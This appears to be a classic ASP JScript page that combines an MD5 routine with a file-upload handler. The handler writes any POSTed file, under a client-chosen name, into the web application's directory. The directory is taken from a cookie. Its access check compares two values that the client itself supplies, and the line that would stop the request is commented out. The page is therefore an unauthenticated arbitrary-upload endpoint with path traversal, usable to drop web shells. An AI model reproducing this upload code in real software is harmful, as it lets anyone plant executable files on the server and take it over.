<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
    Response.AddHeader("Access-Control-Allow-Origin", "*");
    Response.AddHeader("P3P", "CP=CAO PSA OUR");
%>
<%
/*
 * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
 * Digest Algorithm, as defined in RFC 1321.
 * Copyright (C) Paul Johnston 1999 - 2000.
 * Updated by Greg Holt 2000 - 2001.
 * See http://pajhome.org.uk/site/legal.html for details.
 */

/*
 * Convert a 32-bit number to a hex string with ls-byte first
 */
var hex_chr = "0123456789abcdef";
function rhex(num)
{
  str = "";
  for(j = 0; j <= 3; j++)
    str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
           hex_chr.charAt((num >> (j * 8)) & 0x0F);
  return str;
}

/*
 * Convert a string to a sequence of 16-word blocks, stored as an array.
 * Append padding bits and the length, as described in the MD5 standard.
 */
function str2blks_MD5(str)
{
  nblk = ((str.length + 8) >> 6) + 1;
  blks = new Array(nblk * 16);
  for(i = 0; i < nblk * 16; i++) blks[i] = 0;
  for(i = 0; i < str.length; i++)
    blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
  blks[i >> 2] |= 0x80 << ((i % 4) * 8);
  blks[nblk * 16 - 2] = str.length * 8;
  return blks;
}

/*
 * Add integers, wrapping at 2^32. This uses 16-bit operations internally 
 * to work around bugs in some JS interpreters.
 */
function add(x, y)
{
  var lsw = (x & 0xFFFF) + (y & 0xFFFF);
  var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
  return (msw << 16) | (lsw & 0xFFFF);
}

/*
 * Bitwise rotate a 32-bit number to the left
 */
function rol(num, cnt)
{
  return (num << cnt) | (num >>> (32 - cnt));
}

/*
 * These functions implement the basic operation for each round of the
 * algorithm.
 */
function cmn(q, a, b, x, s, t)
{
  return add(rol(add(add(a, q), add(x, t)), s), b);
}
function ff(a, b, c, d, x, s, t)
{
  return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function gg(a, b, c, d, x, s, t)
{
  return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function hh(a, b, c, d, x, s, t)
{
  return cmn(b ^ c ^ d, a, b, x, s, t);
}
function ii(a, b, c, d, x, s, t)
{
  return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

/*
 * Take a string and return the hex representation of its MD5.
 */
function calcMD5(str)
{
  x = str2blks_MD5(str);
  a =  1732584193;
  b = -271733879;
  c = -1732584194;
  d =  271733878;

  for(i = 0; i < x.length; i += 16)
  {
    olda = a;
    oldb = b;
    oldc = c;
    oldd = d;

    a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
    d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
    c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
    b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
    a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
    d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
    c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
    b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
    a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
    d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
    c = ff(c, d, a, b, x[i+10], 17, -42063);
    b = ff(b, c, d, a, x[i+11], 22, -1990404162);
    a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
    d = ff(d, a, b, c, x[i+13], 12, -40341101);
    c = ff(c, d, a, b, x[i+14], 17, -1502002290);
    b = ff(b, c, d, a, x[i+15], 22,  1236535329);    

    a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
    d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
    c = gg(c, d, a, b, x[i+11], 14,  643717713);
    b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
    a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
    d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
    c = gg(c, d, a, b, x[i+15], 14, -660478335);
    b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
    a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
    d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
    c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
    b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
    a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
    d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
    c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
    b = gg(b, c, d, a, x[i+12], 20, -1926607734);
    
    a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
    d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
    c = hh(c, d, a, b, x[i+11], 16,  1839030562);
    b = hh(b, c, d, a, x[i+14], 23, -35309556);
    a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
    d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
    c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
    b = hh(b, c, d, a, x[i+10], 23, -1094730640);
    a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
    d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
    c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
    b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
    a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
    d = hh(d, a, b, c, x[i+12], 11, -421815835);
    c = hh(c, d, a, b, x[i+15], 16,  530742520);
    b = hh(b, c, d, a, x[i+ 2], 23, -995338651);

    a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
    d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
    c = ii(c, d, a, b, x[i+14], 15, -1416354905);
    b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
    a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
    d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
    c = ii(c, d, a, b, x[i+10], 15, -1051523);
    b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
    a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
    d = ii(d, a, b, c, x[i+15], 10, -30611744);
    c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
    b = ii(b, c, d, a, x[i+13], 21,  1309151649);
    a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
    d = ii(d, a, b, c, x[i+11], 10, -1120210379);
    c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
    b = ii(b, c, d, a, x[i+ 9], 21, -343485551);

    a = add(a, olda);
    b = add(b, oldb);
    c = add(c, oldc);
    d = add(d, oldd);
  }
  return rhex(a) + rhex(b) + rhex(c) + rhex(d);
}
%>

<%
/*ASP For Jscript 无组件上传类 V 1.0
 *作者:江湖一键客
 *扣扣:82530662
*/
    var ToolBox = function () {
        this.file = {};
        /*作用:获取二进制、文件字节数、文件名
        *@file_content: 文件内容
        *返回对象{bin:二进制数据,size:数据大小,name:文件名}
        */
        this.file.get_bin_info = function (file_content) {
            var oo = Server.createObject("ADODB.Stream");
            /*获取文件大小*/
            oo.open();
            oo.type = 1;
            oo.write(file_content);
            oo.position = 0;
            oo.type = 2;
            oo.charset = "unicode";
            var gbCode = escape(oo.readText()).replace(/%u(..)(..)/g, "%$2%$1");
            var reg = /%43%6F%6E%74%65%6E%74%2D%54%79%70%65%3A%20%61%70%70%6C%69%63%61%74%69%6F%6E%2F%6F%63%74%65%74%2D%73%74%72%65%61%6D%0D%0A%0D%0A/img;
            reg.exec(gbCode);
            sPos = reg.lastIndex;
            var ePos = sPos;
            reg = /%0D%0A/img;
            reg = /%0D%0A%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D/img;
            var arrHC = [];
            while (reg.exec(gbCode)) {
                ePos = reg.lastIndex;
                arrHC.push(ePos);
            }
            var sLength = bLen - (gbCode.substring(0, gbCode.indexOf("%0D%0A")).length / 3) - sPos / 3 - (arrHC[arrHC.length - 1] - arrHC[arrHC.length - 2]) / 3 - 3;

            //Response.Write(gbCode);
            oo.close();

            /*获取文件二进制内容*/
            oo.open();
            oo.type = 1;
            oo.write(file_content); //target_content file_content
            oo.position = sPos / 3;
            var bFile = oo.read(sLength); //bLen sLength 30 10
            oo.close();

            /*获取文件名*/
            oo.open();
            oo.type = 2;
            oo.writeText(file_content);
            oo.position = 0;
            oo.charset = "gb2312";
            var fileName = oo.readText().match(/filename=\"(.+?)\"/i)[1].split("\\").slice(-1)[0];
            oo.close();

            delete oo;
            return { bin: bFile, size: sLength, name: fileName };
        }

        /*作用: 保存文件
        *@full_file_name: 包含完整路径的文件名
        *@file_obj: 文件对象
        */
        var save_file = function (full_file_name, file_obj) {
            var ads = Server.CreateObject("ADODB.Stream");
            ads.Type = 1;
            ads.Mode = 3;
            ads.Open();
            ads.Write(file_obj);
            ads.SaveToFile(full_file_name, 2);
            ads.Cancel();
            ads.Close();
            delete ads;
        }
        this.file.save_file = save_file;

    }
var TOOLBOX=new ToolBox();
var laws = Request.Cookies("laws") + ""; // +"f938f2cc18095570b719b7e4588a39bf"; /*明文*/
var ciphertext =Request.Cookies("ciphertext") + ""; /*密文*/
var hash = calcMD5(laws);
var msg = null;
//Response.Write(Request.QueryString("PHPSESSID"));
if(hash!=ciphertext){ /*如果没有有权限*/
	Response.Write("You do not have permission to do this...");//您没有权限进行此操作
	//Response.End();
}
if (Request.serverVariables("REQUEST_METHOD")=="POST"){
	var bLen  = Request.TotalBytes;
    var bText = Request.BinaryRead(bLen);
	var path=Request.Servervariables("APPL_PHYSICAL_PATH")+"";
	var mDir = Request.Cookies("dir") + "";
	
	if(mDir!="\\"){
		path=path+Request.Cookies("dir")+"\\";
	}
    var mFile = TOOLBOX.file.get_bin_info(bText, bLen);
	path+=mFile.name;
	TOOLBOX.file.save_file(path,mFile.bin);
}

%>
